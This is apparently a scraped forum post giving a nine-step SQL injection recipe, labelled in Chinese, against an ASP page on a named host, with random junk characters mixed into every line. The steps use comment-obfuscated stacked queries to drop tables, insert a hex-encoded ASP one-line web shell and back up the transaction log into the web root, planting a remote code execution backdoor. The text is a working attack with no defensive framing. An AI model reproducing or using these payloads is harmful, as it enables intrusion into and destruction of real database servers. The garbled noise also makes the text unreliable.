第一步) z \2 V( J- m& {* a
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
6 i/ o0 _* @; r
9 E& I% Y/ l3 q0 {1 d7 l. X/ U第二步:
% }, |$ [5 ? r' { C' Khttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--% B& M: c: F; ], U* B
- U8 O- y' {" e! Z3 Y& `第三步1 K/ P% n+ S7 @( ], l: r
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--5 ], W- R7 L, {- k# Z: c8 t' Q" F
" \( ?: T, L' |7 t
第四步
. T, h! q- y6 d6 U9 J* G% rhttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
; u" E8 x( H% f- y* |# g: J$ \+ i. N/ e& I' y% X- {
第五步
0 ]5 f) a% r% [ ?http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--) C, J$ |0 K% t) i% u! j9 W
* f6 Q0 x% }4 x( Z ~* n第六步; @9 }& Z# T: X0 y# c( o9 c- `, }
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
# }4 }# e: Y4 t4 U- r& E$ _5 W- P. v; }3 ?3 e
第七步
; J: E' o# t6 h. E7 ghttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
: b% H0 x. Y- F. R& S. h; z3 \2 l1 w# m( u: O. H9 i; K$ i) D
第八步3 [/ y$ p/ b) r) j
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
/ b# |5 ?' B! z( d: O) C! y7 c9 U6 G' N: Q
第九步
, N! J5 O+ L5 y& w' t) H2 Ghttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--* u3 f* E# R( w7 {6 R2 t M. v( C
|